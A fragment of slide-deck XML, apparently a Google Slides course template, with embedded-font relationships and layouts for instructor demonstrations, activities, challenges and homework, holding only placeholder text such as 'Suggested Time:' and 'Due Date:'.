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Roboto Thin"/>
      <p:regular r:id="rId33"/>
      <p:bold r:id="rId34"/>
      <p:italic r:id="rId35"/>
      <p:boldItalic r:id="rId36"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Black"/>
      <p:bold r:id="rId37"/>
      <p:boldItalic r:id="rId38"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Medium"/>
      <p:regular r:id="rId39"/>
      <p:bold r:id="rId40"/>
      <p:italic r:id="rId41"/>
      <p:boldItalic r:id="rId42"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto"/>
      <p:regular r:id="rId43"/>
      <p:bold r:id="rId44"/>
      <p:italic r:id="rId45"/>
      <p:boldItalic r:id="rId46"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Light"/>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15:clr>
            <a:srgbClr val="9AA0A6"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" orient="horz" pos="223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B23E420-18AE-46B4-81B6-046E546AB3B5}">
  <a:tblStyle styleId="{9B23E420-18AE-46B4-81B6-046E546AB3B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orient="horz"/>
        <p:guide pos="223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Medium-bold.fntdata"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-boldItalic.fntdata"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-italic.fntdata"/><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obotoLight-bold.fntdata"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-regular.fntdata"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-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RobotoThin-regular.fntdata"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide26.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-italic.fntdata"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-bold.fntdata"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoBlack-bold.fntdata"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-boldItalic.fntdata"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-regular.fntdata"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoBlack-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RobotoLight-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8798eb4c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8798eb4c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125d93cbd4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125d93cbd4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8623a2bef4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8623a2bef4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8623a2bef4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8623a2bef4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125d93cbd4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125d93cbd4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125d93cbd46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125d93cbd46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8798eb4c4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8798eb4c4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8623a2bef4_1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8623a2bef4_1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8623a2bef4_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8623a2bef4_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8623a2bef4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8623a2bef4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8623a2bef4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8623a2bef4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8623a2bef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8623a2bef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8798eb4c4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8" name="Google Shape;1258;g8798eb4c4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8798eb4c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8798eb4c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8798eb4c44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8798eb4c44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8798eb4c4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8798eb4c4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7" name="Shape 1287"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1288" name="Google Shape;1288;g8798eb4c44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9" name="Google Shape;1289;g8798eb4c44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8798eb4c44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8798eb4c44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8798eb4c44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5" name="Google Shape;1305;g8798eb4c44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80f7e6291e_1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80f7e6291e_1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798eb4c4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798eb4c4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8798eb4c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8798eb4c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8798eb4c4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8798eb4c4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8798eb4c44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8798eb4c4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125d93cbd46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125d93cbd46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8623a2be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8623a2be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2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7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 Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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3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3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 Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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9.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11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3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7"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9" name="Google Shape;9;p2"/>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
        <p:nvSpPr>
          <p:cNvPr id="11" name="Google Shape;11;p2"/>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12" name="Google Shape;12;p2"/>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13" name="Google Shape;13;p2"/>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 name="Google Shape;14;p2"/>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 name="Google Shape;15;p2"/>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16" name="Google Shape;16;p2"/>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nstructor Demonstration">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="82" name="Shape 82"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="83" name="Google Shape;83;p11"/>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84" name="Google Shape;84;p11"/>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7" name="Google Shape;87;p11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="242550" y="3895344"/>
            <a:ext cx="8907900" cy="427500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="0" spcFirstLastPara="1" rIns="914400" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="r">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88" name="Google Shape;88;p11"/>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9" name="Google Shape;89;p11"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="409963" y="-228600"/>
            <a:ext cx="8535272" cy="4064423"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90" name="Google Shape;90;p11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-101100" y="4387000"/>
            <a:ext cx="9251400" cy="482100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="457200" spcFirstLastPara="1" rIns="914400"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Activity">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="91" name="Shape 91"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="92" name="Google Shape;92;p12"/>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3" name="Google Shape;93;p12"/>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 name="Google Shape;94;p12"/>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5" name="Google Shape;95;p12"/>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 name="Google Shape;96;p12"/>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12"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="39" l="0" r="0" t="29"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="899000" y="1133363"/>
            <a:ext cx="1737360" cy="1911096"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98" name="Google Shape;98;p1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2"/>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00" name="Google Shape;100;p12"/>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1" name="Google Shape;101;p12"/>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Activity with Instructions ">
  <p:cSld name="CUSTOM_2_5_1_3_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="102" name="Shape 102"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="103" name="Google Shape;103;p13"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="39" l="0" r="0" t="29"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8275625" y="4154800"/>
            <a:ext cx="594361" cy="653795"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="Google Shape;104;p1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05" name="Google Shape;105;p1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06" name="Google Shape;106;p1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7" name="Google Shape;107;p1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8" name="Google Shape;108;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2"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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="109" name="Google Shape;109;p1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10" name="Google Shape;110;p13"/>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1" name="Google Shape;111;p13"/>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Challenge">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_4">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="112" name="Shape 112"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="113" name="Google Shape;113;p14"/>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14" name="Google Shape;114;p14"/>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116" name="Google Shape;116;p1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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph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8" name="Google Shape;118;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2"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9" name="Google Shape;119;p14"/>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Suggested Time:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1300">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120" name="Google Shape;120;p14"/>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21" name="Google Shape;121;p14"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="273900" y="-595025"/>
            <a:ext cx="2950353" cy="51435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Challenge with Instructions">
  <p:cSld name="CUSTOM_2_5_1_4">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="122" name="Shape 122"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123" name="Google Shape;123;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph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4" name="Google Shape;124;p1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25" name="Google Shape;125;p1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26" name="Google Shape;126;p15"/>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27" name="Google Shape;127;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2"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28" name="Google Shape;128;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3"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29" name="Google Shape;129;p1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30" name="Google Shape;130;p15"/>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131" name="Google Shape;131;p15"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8213200" y="3862850"/>
            <a:ext cx="656773" cy="114497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Homework">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_3_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="132" name="Shape 132"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="133" name="Google Shape;133;p16"/>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134" name="Google Shape;134;p16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-7350" y="0"/>
            <a:ext cx="9157800" cy="274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 name="Google Shape;135;p16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="209" r="209" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="858369" y="1097625"/>
            <a:ext cx="1737361" cy="1980591"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136" name="Google Shape;136;p16"/>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7" name="Google Shape;137;p16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8062160" y="3975150"/>
            <a:ext cx="548640" cy="725893"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138" name="Google Shape;138;p1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16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-101100" y="4234600"/>
            <a:ext cx="8970300" cy="634500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="457200" spcFirstLastPara="1" rIns="1005825" wrap="square" tIns="9125">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="r">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0" name="Google Shape;140;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274325" y="3943225"/>
            <a:ext cx="7658400" cy="33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300">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Due Date:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1300">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141" name="Google Shape;141;p1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2" name="Google Shape;142;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="273900" y="1042875"/>
            <a:ext cx="8595300" cy="2764200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="457200" lIns="2560300" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="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1800">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Homework with Instructions">
  <p:cSld name="CUSTOM_2_5_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="143" name="Shape 143"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144" name="Google Shape;144;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1284250"/>
            <a:ext cx="9144000" cy="31992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145" name="Google Shape;145;p1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46" name="Google Shape;146;p1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pic>
        <p:nvPicPr>
          <p:cNvPr id="147" name="Google Shape;147;p17"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="504" r="504" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8257069" y="4200875"/>
            <a:ext cx="548641" cy="624077"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148" name="Google Shape;148;p1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17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2"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0" name="Google Shape;150;p1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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="4641650"/>
            <a:ext cx="9168600" cy="264900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="1097275" spcFirstLastPara="1" rIns="1005825" wrap="square" tIns="9125">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="r">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2" name="Google Shape;152;p17"/>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5005">
          <p15:clr>
            <a:srgbClr val="F9AD4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Numbered 1–4 (Green)">
  <p:cSld name="CUSTOM_2_7_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="153" name="Shape 153"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="154" name="Google Shape;154;p1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56" name="Google Shape;156;p1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57" name="Google Shape;157;p1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58" name="Google Shape;158;p1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59" name="Google Shape;159;p1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60" name="Google Shape;160;p1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61" name="Google Shape;161;p18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1378813"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="162" name="Google Shape;162;p18"/>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63" name="Google Shape;163;p18"/>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18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="2228725"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="165" name="Google Shape;165;p18"/>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66" name="Google Shape;166;p18"/>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 name="Google Shape;167;p18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3073850"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="168" name="Google Shape;168;p18"/>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69" name="Google Shape;169;p18"/>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 name="Google Shape;170;p18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3923750"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="171" name="Google Shape;171;p18"/>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72" name="Google Shape;172;p18"/>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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="13980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4" name="Google Shape;174;p1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ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="2233538"/>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8" name="Google Shape;178;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3076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9" name="Google Shape;179;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="39189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Numbered 1–5 (Green)">
  <p:cSld name="CUSTOM_2_7_1_4">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="180" name="Shape 180"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="181" name="Google Shape;181;p19"/>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83" name="Google Shape;183;p1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184" name="Google Shape;184;p1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185" name="Google Shape;185;p1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186" name="Google Shape;186;p1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187" name="Google Shape;187;p1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188" name="Google Shape;188;p19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1300225"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="189" name="Google Shape;189;p19"/>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90" name="Google Shape;190;p19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="969614" y="1607625"/>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19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="2000125"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="192" name="Google Shape;192;p19"/>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93" name="Google Shape;193;p19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="969614" y="1607625"/>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9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="2692850"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="195" name="Google Shape;195;p19"/>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96" name="Google Shape;196;p19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="969614" y="1607625"/>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7" name="Google Shape;197;p19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3390350"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="198" name="Google Shape;198;p19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1378813"/>
              <a:ext cx="695400" cy="621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99" name="Google Shape;199;p19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="969614" y="1607625"/>
              <a:ext cx="34032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0" name="Google Shape;200;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-7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1" name="Google Shape;201;p19"/>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9"/>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9"/>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9"/>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5" name="Google Shape;205;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="26952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06" name="Google Shape;206;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="3385563"/>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07" name="Google Shape;207;p19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="469500" y="4083075"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="208" name="Google Shape;208;p19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
